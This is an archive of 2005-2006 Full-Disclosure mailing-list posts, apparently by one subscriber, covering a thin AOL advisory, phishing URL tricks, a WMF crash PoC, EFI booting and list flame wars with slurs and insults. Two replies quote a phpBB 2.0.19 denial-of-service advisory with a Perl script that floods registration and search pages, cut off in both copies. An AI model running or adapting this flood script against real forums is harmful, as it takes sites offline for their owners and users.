!ADVISORY! + +Thu Mar 16 14:28:51 EST 2006+ + Off-by-one in AOL Client Software == 8===D DESCRIPTION == It is possible to make AOL Client Software crash by the use of malformed input. == 8===D HISTORY == 2/25/2006 8==D Vendor Notification. 1/11/2006 8==D Vendor Reply. 3/16/2006 8==D Public Disclosure. == APPENDIX A VENDOR INFORMATION == http://www.aol.com == APPENDIX B REFERENCES == RFC 4090 == CONTACT == Edward Pearson [EMAIL PROTECTED] 1-888-565-9428 CISSP CCE CEH CSFA SSP-MPA GWAS CAP SSCP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] my first question
He's talking about BNC (like psyBNC) for IRC networks "is it possible to connect all server" - Not looking to start a botnet are we? Normally the list is reserved for more specific questions, or advisories. Perhaps you couldbe alittleclearer about what version of BNC you're interested in? and what platform its running on. Ed From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [CTN]-BongSnoTbOmBs[CTN]Sent: 14 March 2006 23:14To: full-disclosure@lists.grok.org.ukSubject: [Full-disclosure] my first question hi, i'm italian..my eng is not very good..:D i'm search a BNCexploit.. is possible to connect all server?it's a question.. tnx ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] strange domain name in phishing email
IE5 was the last version of IE to support that kind on octal URL. In IE6 it has been deprecated. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Julien GROSJEAN - Proxiad Sent: 14 March 2006 08:45 To: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED] Subject: Re: [Full-disclosure] strange domain name in phishing email I think you try to remove the slash at the end... What about the logs ? Alice Bryson a écrit : BTW, this kind of ip address would not always work. i try to use http://2887060730/ to access an internal web server http://172.21.12.250, but failed. It said 400 bad request. I use Windows XP IE 6, web server is Apache on Windows 2003, does anyone know why? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability
No, I do believe full-disclosure to be the best
method. In the case of DoS attacks, I thinka point should be made of
making sure the vendor is informed, and a patch available before disclosed, then
I beleive itw down to the author's discretion when he releases the exploit, even
if its a PoC.
From: poo [mailto:[EMAIL PROTECTED]
Sent: 26 January 2006 11:31To: Edward
PearsonCc: full-disclosure@lists.grok.org.ukSubject: Re:
[Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS
Vulnerability
so what youre saying is that DoS exploits shouldnt be
disclosed?
On 1/25/06, Edward
Pearson [EMAIL PROTECTED]
wrote:
The less
said about DoS attacks the better.A tacticmostly employed by
asexual teenagers who live in their parent's basement and call themselves
"h4x0rz".
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of
h4cky0uSent: 25 January 2006 14:44To: full-disclosure@lists.grok.org.ukCc: bugtraq@securityfocus.comSubject:
[Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS
Vulnerability
-- HYSA-2006-001 h4cky0u.org Advisory 010
--Date - Wed Jan 25 2006
TITLE:==phpBB 2.0.19 search.php and profile.php DOS VulnerabilitySEVERITY:=HighSOFTWARE:=phpBB 2.0.19 and priorINFO:
=phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.Support Website :
http://www.phpbb.com
BUG DESCRIPTION:The bug was originally found by HaCkZaTaN of NeoSecurityteam. The original exploit code can be found at -
http://h4cky0u.org/viewtopic.php?t=637
This one affected only versions uptill phpBB 2.0.15. The exploit code has been recoded which affects the latest version too. The bug resides in the following two scripts-profile.php By registering as many users as you can.
search.php By searching in a way that the db cannot understand.Proof Of Concept Code:==#!/usr/bin/perl ### ## Recoded by: mix2mix and Elioni of
http://ahg-khf.org## And h4cky0u Security Forums (
http://h4cky0u.org) ## Name: phpBBDoSReloaded## Original Author: HaCkZaTaN of Neo Security Team
## Tested on phpBB 2.0.19 and earlier versions## Ported to perl by g30rg3_x## Date: 25/01/06### use IO::Socket; ## Initialized X $x = 0; print q(
phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN Recoded by Albanian Hackers Group h4cky0u Security Forums ); print q(Host |without- http://www.| );
$host = STDIN; chop ($host); print q(Path |example- /phpBB2/ or /| ); $pth = STDIN; chop ($pth); print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| );
$type = STDIN; chop ($type); ## Tipi për regjistrim if($type == 1){ ## User Loop for loops (enough for Flood x) while($x != ) { ## Antari që regjistrohet automatikishtë "X"
$uname = "username=AHG__" . "$x"; ## Emaili që regjistrohet ne bazën "X" $umail = "email=AHG__" . "$x"; $postit = "$uname"."$umail"."%40ahg-
crew.orgnew_password=0123456password_confirm=0123456icq=aim=N%2FAmsn=yim=website=location=occupation=interests=signature=viewemail=0hideonline=0notifyreply=0notifypm=1popup_pm=1attachsig=1allowbbcode=1allowhtml=0allowsmilies=1language=englishstyle=2timezone=0dateformat=D+M+d%2C+Y+g%3Ai+amode=registeragreed=truecoppa=0submit=Submit
"; $lrg = length $postit; my $sock = new IO::Socket::INET ( PeerAddr = "$host", PeerPort = "80",
Proto = "tcp", ); die "\nNuk mundem te lidhemi me hostin sepse ësht dosirat ose nuk egziston: $!\n" unless $sock; ## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
print $sock "POST $pth"."profile.php HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:
RE: [Full-disclosure] can a brother get some disclosure?
Ok, you're speaking english, but the message just isn't getting accross. Think grammer. Clearly you're trying to boot Windows Vista/XPon the Intel Macand claim $3000+ for yourself. Well my good sir, don't be so lazy, we're not going to work to win you a competition. Especailly when (I assume) it'll have taken most people a while to decipher what the hell you are talking about. As far was the EDI goes, we're in a catch 22 with the Windows boot. EFI won't boot MBR (El Torito, UDF) records, nor will it even recognise them. You can get windows installas far as "Press any key to boot from the CD" by copying the kernel + data to a HD/USB. But after that it'll die because it can't see theinstall CD. The options? Edit the Vista/XP kernel to boot + installfrom a HD partition (Good luck), ormod the EDI so it can reconise UDF or El Torito (Good luck). So basically, you don't have a fucking chance. Bye now! Ed From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of PCSC Information ServicesSent: 25 January 2006 02:47To: full-disclosure@lists.grok.org.ukSubject: [Full-disclosure] can a brother get some disclosure? Hi all, I'm sure you're aware that there is a new Intel iMac out there. Can we get some info on the system boot sequence to be certain that the EFI module is in no way 'blessed' by the TPM module prior to initialization? I have only one box to give, and while I'm interested in having this issue fully disclosed, I am unable to utilize this machine for this purpose, in that I'm offering it up as a sacrificial Universal Binary lamb. I feel the community is best served by having solid well coded, software running in OS X. Rather than attempting to do both, and serve neither purpose, I'm putting it to full-disclosurati to out the boot process in all steps, keep in mind there's a bounty for this fun and frivolity with a 17" piece of plastic! It's growing all the time! Thanks in advance, Sean Swayze When you have eliminated all which is impossible, then whatever remains, however improbable, must be the truth. -Sherlock Holmes ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability
The less said about DoS attacks the better.A
tacticmostly employed by asexual teenagers who live in their parent's
basement and call themselves "h4x0rz".
From:
[EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
h4cky0uSent: 25 January 2006 14:44To:
full-disclosure@lists.grok.org.ukCc:
bugtraq@securityfocus.comSubject: [Full-disclosure] HYSA-2006-001
phpBB 2.0.19 search.php andprofile.php DOS Vulnerability
-- HYSA-2006-001 h4cky0u.org Advisory 010--Date - Wed Jan 25 2006
TITLE:==phpBB 2.0.19 search.php and profile.php DOS VulnerabilitySEVERITY:=HighSOFTWARE:=phpBB 2.0.19 and priorINFO:
=phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.Support Website : http://www.phpbb.com
BUG DESCRIPTION:The bug was originally found by HaCkZaTaN of NeoSecurityteam. The original exploit code can be found at -http://h4cky0u.org/viewtopic.php?t=637
This one affected only versions uptill phpBB 2.0.15. The exploit code has been recoded which affects the latest version too. The bug resides in the following two scripts-profile.php By registering as many users as you can.
search.php By searching in a way that the db cannot understand.Proof Of Concept Code:==#!/usr/bin/perl ### ## Recoded by: mix2mix and Elioni of
http://ahg-khf.org## And h4cky0u Security Forums (http://h4cky0u.org) ## Name: phpBBDoSReloaded## Original Author: HaCkZaTaN of Neo Security Team
## Tested on phpBB 2.0.19 and earlier versions## Ported to perl by g30rg3_x## Date: 25/01/06### use IO::Socket; ## Initialized X $x = 0; print q(
phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN Recoded by Albanian Hackers Group h4cky0u Security Forums ); print q(Host |without- http://www.| );
$host = STDIN; chop ($host); print q(Path |example- /phpBB2/ or /| ); $pth = STDIN; chop ($pth); print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| );
$type = STDIN; chop ($type); ## Tipi për regjistrim if($type == 1){ ## User Loop for loops (enough for Flood x) while($x != ) { ## Antari që regjistrohet automatikishtë "X"
$uname = "username=AHG__" . "$x"; ## Emaili që regjistrohet ne bazën "X" $umail = "email=AHG__" . "$x"; $postit = "$uname"."$umail"."%40ahg-
crew.orgnew_password=0123456password_confirm=0123456icq=aim=N%2FAmsn=yim=website=location=occupation=interests=signature=viewemail=0hideonline=0notifyreply=0notifypm=1popup_pm=1attachsig=1allowbbcode=1allowhtml=0allowsmilies=1language=englishstyle=2timezone=0dateformat=D+M+d%2C+Y+g%3Ai+amode=registeragreed=truecoppa=0submit=Submit
"; $lrg = length $postit; my $sock = new IO::Socket::INET ( PeerAddr = "$host", PeerPort = "80",
Proto = "tcp", ); die "\nNuk mundem te lidhemi me hostin sepse ësht dosirat ose nuk egziston: $!\n" unless $sock; ## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
print $sock "POST $pth"."profile.php HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n"; close($sock); ## Print a "+" for every loop syswrite STDOUT, "+"; $x++; }
## Tipi 2-shë për Kërkim(Flood) } elsif ($type == 2){ while($x != ) { ## Final Search String to Send $postit = "search_keywords=Albanian+Hackers+Group+Proof+of+Concept+$x+search_terms=anysearch_author=search_forum=-1search_time=0search_fields=msgonlysearch_cat=-1sort_by=0sort_dir=ASCshow_results=postsreturn_chars=200";
## Posit Length $lrg = length $postit; ## Connect Socket with Variables Provided By User my $sock = new IO::Socket::INET ( PeerAddr = "$host",
PeerPort = "80", Proto = "tcp", ); die "\nThe
RE: [Full-disclosure] Improper Character Handling In PHP Based Scriptslike PhpBB, IPB etc.
Nice, When I was playing around with this on a test server,when pasting it into a certain formbit, Firefox's stack overflowed. Will look into it and let you guys know. Ed From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of h4cky0uSent: 24 January 2006 10:43To: full-disclosure@lists.grok.org.ukSubject: [Full-disclosure] Improper Character Handling In PHP Based Scriptslike PhpBB, IPB etc. Well this was after i found somebody posing as me on my site -- http://www.h4cky0u.orgwhich was actually quite interesting and dangerous (looking from the social engineering point of view). Download the following file - http://www.h4cky0u.org/poc.txt Make sure you download it and not view it from the browser. Once you download that file open it in your text editor. You should see something like- --desiredusername Copy that whole string and try and post it on any PHP Based blog, forum etc or register a username with that string. Now what do you see? The -- part from --desiredusername is gone! But apparently its still there. It still hides within that string(Try and reverse the process you just did). Ok so the bug has been confirmed. Now come the questions - 1) Is thisreally a bug in PHP (tested with PHP 4.3.11 and later versions might as well be affected)? Or am i overlooking something? 2) What is the ASCII code of that -- part in the file if it isn't just 2 simple hyphens? (Tried all the possible methods but couldnt come up with anything positive.) 3) What are the possible ways to avoid something like this? -- http://www.h4cky0u.org(In)Security at its best... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] PoC for the 2 new WMF vulnerabilities (DoS)
As far as I can tell this isnt exploitable, can I get a second on that? From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Drew Masters Sent: 10 January 2006 12:20 To: Andrey Bayora Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] PoC for the 2 new WMF vulnerabilities (DoS) Not sure if it's been previously mentioned... It's possible to cause similiar crashes by making a malformed call to startdoc instead of setabortproc with 64bytes of garbage data. Cheers Drew On 09/01/06, Andrey Bayora [EMAIL PROTECTED] wrote: Hello list, In case, someone interested: Here is the PoC for the 2 new WMF vulnerabilities discovered by cocoruder (http://ruder.cdut.net) and does not covered by MS06-001. You can download WMF images at: http://www.securityelf.org/files/WMF-DoS.rar Regards, Andrey. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] XSS vulnerabilities in Google.com
Why has this become a trolling? if noone tell him what a stupid fag he is Are we back at fucking middle school? Have we decended to the level of 10 year olds?? Ground Zero, I've seen your company website(s) and your products. All I say is I think you have several very good resons to pay FUCKING close attention to what is said on this list. Work it out. The only people who seem hell bent on ruining this list for everyone are: InfoSecBOFH n3td3v Ground Zero Security None of these people have anything to bring to the table. Lets see at least one real vuln report/exploit from one of you, and then the other two have to concentrate on growing up enough to not troll it or make stupid pre-school comments. Come on guys!!! I'm beginning to thing that actually you're not bigger than this... Ultimatly, if you've got problems with each other, do it on MSN, AIM, IRC, USENET whatever, just not my inbox. Have a fucking excellent day. - Ed (BTW, Ground Zero's has my alais since 1995, now I see that this chump is going round putting a black mark by it) -Original Message-e From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v Sent: 21 December 2005 17:17 To: GroundZero Security; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com You trolled this thread by saying Watchfire should stop disclosing vulnerabilities for Yahoo and Google. You get the response you deserved to get. Now you're running off the thread now with your tail between your legs, because everyone has told you that Google and Yahoo vulnerabilities (especially XSS) will never be banned from FD. On 12/21/05, GroundZero Security [EMAIL PROTECTED] wrote: yes you are right, but its like if noone tells him what a stupid fag he is, he will keep posting and posting his irrelevant crap and just ignore the tons of private mail he receives. i'm sorry for adding to the noise, but its just too tempting. i try to ignore it. but i cant promise i will, the last mail he sent just asks for a reply :P but ok...must...resist. btw my name is not groundzero, thats my company :) greetz -sk ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Please read. I feel this is important.
People, Please read all of this and take note. It'll take two minutes of your time. When I opened my e-mail this morning, and jumped to the FD folder, what is saw was the straw that broke the camels back. Of the 300(ish) e-mails I got today, Almost all were titled, A small editorialaboutrecentevents, which is basically some of the people on this list arguing about American politics (from what I can glean from the e-mail I did read). Of few remaining e-mails there was one, and only 1 security related topic. This is not why this list was created. To have one e-mail on topic and the rest I can only class as spam. On such a respected list, that I have been a keen subscriber to for years. THIS IS A LIST FOR SECURITY, NOT FOR THE AMERICAN PUBLIC TO DISCUSS WHATS WRONG WITH THEIR COUNTRY; WE'RE BORED OF HEARING ABOUT YOU IN THE REAL NEWS, TRY AND KEEP IT OUT OF FULL-DISCLOSURE. This is not what the list was designed for and believe me the people making these stupid topics are the ones with the least to bring to the table. Those people who have something to offer, will be driven away (this is happening already) and soon, the list will die. I've seen calls for moderation, and people discussing ways of pruning out the problem posts. All these topics turned into a complete farce, becoming what they hoped to stop. We must strive to keep this list alive and make is as important and respected as it once was (Those who have been around a while will remember internet-wide ripple that could be caused by that one mail to the list.) The list literally has toppled major corporations and changed the views and opinions of many of the most important people on the internet. Even before computing became a big part of my life, before I'd ever used a M$ product I had heard of FD. So people please, even if what you post is good information. Stop for a few seconds and think. Is this security related? When somebody sees this on Full-Disclosure, will there be any doubt of its relevance? To save myself becoming a complete hypocrite, I'd like to ask that nobody reply to this, just make sure you read and take note. Even if you disagree. Edward Pearson - IT Engineer t: 08708518188 f: 08707947943 m: 07729155751 w: www.unitymail.co.uk 9 Fishers Estate | Wiggenhall Road | Watford | Hertfordshire | WD18 0FN ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Please read. I feel this is important.
I hate to do exactly what I asked you guys not to However for me this sums it all up. This is an e-mail I received this morning from somebody (no names mentioned) on the list [direct quote] Sorry man I just wanted some traffic besides netdev, so long as he doesnt post, I will keep mailings restricted to security related hoop-a-ma-joop, but I have a plan to douse netdev infosec bofh and the like by using the only thing that is guaranteed generates more responses than trolling: american political rhetoric sorry for the inconvienence [/direct quote] The guy who sent this has missed the point entirely... I'll shut up about this now, but please understand, this isn't the solution, this is the problem. Best Wishes. Edward Pearson - IT Engineer t: 08708518188 f: 08707947943 m: 07729155751 w: www.unitymail.co.uk 9 Fishers Estate | Wiggenhall Road | Watford | Hertfordshire | WD18 0FN -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Edward Pearson Sent: 19 December 2005 12:24 To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Please read. I feel this is important. People, Please read all of this and take note. It'll take two minutes of your time. When I opened my e-mail this morning, and jumped to the FD folder, what is saw was the straw that broke the camels back. Of the 300(ish) e-mails I got today, Almost all were titled, A small editorialaboutrecentevents, which is basically some of the people on this list arguing about American politics (from what I can glean from the e-mail I did read). Of few remaining e-mails there was one, and only 1 security related topic. This is not why this list was created. To have one e-mail on topic and the rest I can only class as spam. On such a respected list, that I have been a keen subscriber to for years. THIS IS A LIST FOR SECURITY, NOT FOR THE AMERICAN PUBLIC TO DISCUSS WHATS WRONG WITH THEIR COUNTRY; WE'RE BORED OF HEARING ABOUT YOU IN THE REAL NEWS, TRY AND KEEP IT OUT OF FULL-DISCLOSURE. This is not what the list was designed for and believe me the people making these stupid topics are the ones with the least to bring to the table. Those people who have something to offer, will be driven away (this is happening already) and soon, the list will die. I've seen calls for moderation, and people discussing ways of pruning out the problem posts. All these topics turned into a complete farce, becoming what they hoped to stop. We must strive to keep this list alive and make is as important and respected as it once was (Those who have been around a while will remember internet-wide ripple that could be caused by that one mail to the list.) The list literally has toppled major corporations and changed the views and opinions of many of the most important people on the internet. Even before computing became a big part of my life, before I'd ever used a M$ product I had heard of FD. So people please, even if what you post is good information. Stop for a few seconds and think. Is this security related? When somebody sees this on Full-Disclosure, will there be any doubt of its relevance? To save myself becoming a complete hypocrite, I'd like to ask that nobody reply to this, just make sure you read and take note. Even if you disagree. Edward Pearson - IT Engineer t: 08708518188 f: 08707947943 m: 07729155751 w: www.unitymail.co.uk 9 Fishers Estate | Wiggenhall Road | Watford | Hertfordshire | WD18 0FN ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
